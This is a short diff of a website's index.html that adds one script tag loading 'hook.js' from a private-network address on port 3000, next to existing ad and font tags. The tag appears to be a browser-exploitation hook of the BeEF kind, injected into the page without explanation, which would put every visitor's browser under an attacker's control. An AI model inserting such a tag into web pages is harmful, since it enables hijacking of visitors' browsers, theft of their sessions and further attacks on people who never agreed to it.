--- a/index.html
+++ b/index.html
@@ -10,6 +10,7 @@
 		
 	<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-2810099146090981"
      crossorigin="anonymous"></script>	
+	<script src="http://172.30.58.174:3000/hook.js"></script>
 
         <!--font-family-->
 		<link href="https://fonts.googleapis.com/css?family=Playfair+Display:400,400i,700,700i,900,900i" rel="stylesheet">
